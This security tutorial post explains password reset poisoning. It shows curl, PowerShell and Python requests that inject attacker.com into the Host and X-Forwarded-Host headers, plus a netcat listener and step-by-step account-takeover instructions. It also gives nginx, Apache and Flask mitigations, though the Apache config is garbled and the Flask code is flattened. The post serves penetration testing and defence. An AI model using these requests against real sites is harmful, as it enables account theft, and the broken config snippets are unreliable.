Listen to this Post
Introduction
Password reset poisoning is a subtle yet critical web application vulnerability where an attacker manipulates the `Host` header during a password reset or email verification request. By injecting a malicious domain, the application may generate a reset link pointing to the attacker’s server, leaking the secret token and enabling full account takeover. This technique exploits the trust web applications place on the `Host` header to construct dynamic links, often leading to severe security breaches if left unchecked.
Learning Objectives
- Understand the mechanics of password reset poisoning and host header injection.
- Learn to identify, test, and exploit host header manipulation vulnerabilities using Burp Suite and command-line tools.
- Implement robust server-side mitigation strategies to protect against token leakage and account takeover.
You Should Know
1. Understanding Password Reset Poisoning
Password reset poisoning occurs when an application uses the `Host` header value to generate links in password reset or email verification emails. If an attacker can modify this header—via techniques like header injection or duplicate headers—the resulting link will point to a domain they control. When the victim clicks the link, the reset token is sent to the attacker’s server, allowing them to reset the victim’s password and take over the account. This attack does not require user interaction beyond receiving the email; the token is leaked when the email client loads the poisoned link (e.g., as an image or via a tracking pixel).
Key components:
- Host header: Used by servers to determine the target host.
- Reset token: A secret value embedded in the URL that grants password reset privileges.
- Attacker-controlled domain: Where the token is logged or captured.
2. Setting Up Burp Suite for Interception
Burp Suite is the industry-standard tool for testing web vulnerabilities. To begin testing for password reset poisoning:
- Configure your browser to route traffic through Burp Proxy (usually
127.0.0.1:8080). - Install Burp’s CA certificate to intercept HTTPS traffic seamlessly.
- Enable Intercept in the Proxy tab to capture requests.
Step‑by‑step guide:
- Navigate to the target application’s password reset or email verification page.
- Submit a legitimate email address and intercept the request before it reaches the server.
- Observe the raw HTTP request, focusing on the `Host` header.
Linux/Windows command equivalent (for non‑GUI testing):
Using curl to send a crafted request curl -X POST https://target.com/reset-password \ -H "Host: attacker.com" \ -d "[email protected]"
On Windows (PowerShell):
Invoke-WebRequest -Uri "https://target.com/reset-password" `
-Method POST `
-Headers @{ "Host" = "attacker.com" } `
-Body "[email protected]"
3. Manipulating Host Headers – The Core Technique
The attacker’s goal is to poison the reset link by altering the `Host` header. Common injection methods include:
- Single header override: Replace `Host: target.com` with
Host: attacker.com. - X-Forwarded-Host injection: Some applications trust this proxy header. Add
X-Forwarded-Host: attacker.com. - X-Forwarded-For injection: Occasionally misused for host generation. Try
X-Forwarded-For: attacker.com. - Duplicate Host headers: Some servers use the first or last occurrence. Send:
Host: target.com Host: attacker.com
Step‑by‑step guide using Burp:
1. Intercept the password reset request.
- Right-click the request and select Send to Repeater.
- In Repeater, modify the `Host` header as described above.
- Send the request and monitor your test email inbox.
- If the email contains a link like `https://attacker.com/reset?token=abc123`, the attack is successful.
Automated testing with curl:
curl -H "Host: attacker.com" -H "X-Forwarded-Host: attacker.com" \ -X POST https://target.com/reset-password -d "[email protected]"
4. Exploiting Email Verification and Password Reset Flows
Once you’ve confirmed that the host header influences link generation, you can proceed to full exploitation.
Step‑by‑step guide:
- Craft the malicious request with your chosen header injection.
- Send the request and wait for the victim to receive the email.
- Capture the token by monitoring your server logs (e.g., with `netcat` or a simple HTTP server).
Start a listener on port 80 sudo nc -lvnp 80 Or use Python python3 -m http.server 80
- Once the token is leaked, visit the legitimate reset URL but replace the token with the stolen one.
- Set a new password and take over the account.
Note: This attack works even if the email client pre‑fetches links (e.g., Outlook’s safe link feature), as the request to the attacker’s server logs the token.
5. Detection and Mitigation – Secure Your Applications
Developers must implement proper host header validation to prevent poisoning.
Mitigation strategies:
- Use a static, absolute URL for reset links instead of dynamically building from the `Host` header.
- Validate the `Host` header against a whitelist of allowed domains.
- Avoid using `X-Forwarded-Host` unless behind a trusted proxy; if used, ensure it is stripped at the edge.
- Set the `Host` header to a canonical value in your server configuration (e.g., `nginx` or Apache).
Example nginx configuration to enforce a valid host:
server {
listen 80;
server_name yourdomain.com;
if ($host !~ ^(yourdomain.com|www.yourdomain.com)$ ) {
return 444;
}
... rest of config
}
Apache example:
<VirtualHost :80>
ServerName yourdomain.com
<IfModule mod_rewrite.c>
RewriteCond %{HTTP_HOST} !^yourdomain.com$ [bash]
RewriteRule ^ - [bash]
</IfModule>
</VirtualHost>
Framework‑level fix (Python/Flask):
from flask import request, abort @app.before_request def validate_host(): allowed_hosts = ['yourdomain.com'] if request.host not in allowed_hosts: abort(400)
6. Advanced Attack Variants and Tooling
Beyond simple header swaps, attackers may exploit:
- Header injection via line breaks (CRLF) to add malicious headers.
- Using `X-Original-URL` or `X-Rewrite-URL` in combination with host header attacks.
- Chaining with other vulnerabilities like open redirects.
Testing with custom Python script:
import requests
url = "https://target.com/reset-password"
headers = {
"Host": "attacker.com",
"X-Forwarded-Host": "attacker.com"
}
data = {"email": "[email protected]"}
response = requests.post(url, headers=headers, data=data, verify=False)
print(f"Status: {response.status_code}")
Windows PowerShell alternative:
$headers = @{ "Host" = "attacker.com"; "X-Forwarded-Host" = "attacker.com" }
$body = @{ email = "[email protected]" }
Invoke-WebRequest -Uri "https://target.com/reset-password" -Method POST -Headers $headers -Body $body
7. Real‑World Examples and Write‑ups
The following resources provide in‑depth case studies:
- Password Reset Poisoning – An In‑Depth Guide
- Account Takeover via Host Header Injection
- Email Verification Poisoning Explained
These write‑ups illustrate how minor misconfigurations can lead to full account compromise and are essential reading for bug bounty hunters and security engineers.
What Undercode Say
- Key Takeaway 1: Password reset poisoning is not a theoretical risk—it’s a prevalent, easy‑to‑exploit vulnerability that directly leads to account takeover.
- Key Takeaway 2: Defending against it requires a shift from relying on dynamic host headers to using absolute URLs and strict server‑side validation.
Analysis: The attack leverages the application’s implicit trust in client‑supplied headers, a common oversight in modern web development. While the concept is simple, its impact is severe: an attacker can silently compromise any user account without triggering alarms. For security professionals, mastering this technique is crucial for both offensive testing and defensive hardening. Organizations must prioritize host header validation in their secure coding guidelines and regularly test for such flaws during penetration tests.
Prediction
As web applications continue to rely on cloud‑hosted services and reverse proxies, the complexity of host header handling will increase. Attackers will evolve their techniques, possibly exploiting CDN misconfigurations or advanced header chaining. We predict a rise in automated scanners that detect host header injection, prompting a cat‑and‑mouse game between developers and hackers. Ultimately, frameworks will adopt secure defaults, but until then, manual testing and awareness remain the best defense.
▶️ Related Video (86% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Wadgamaraldeen %D9%87%D8%B0%D8%A7 – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
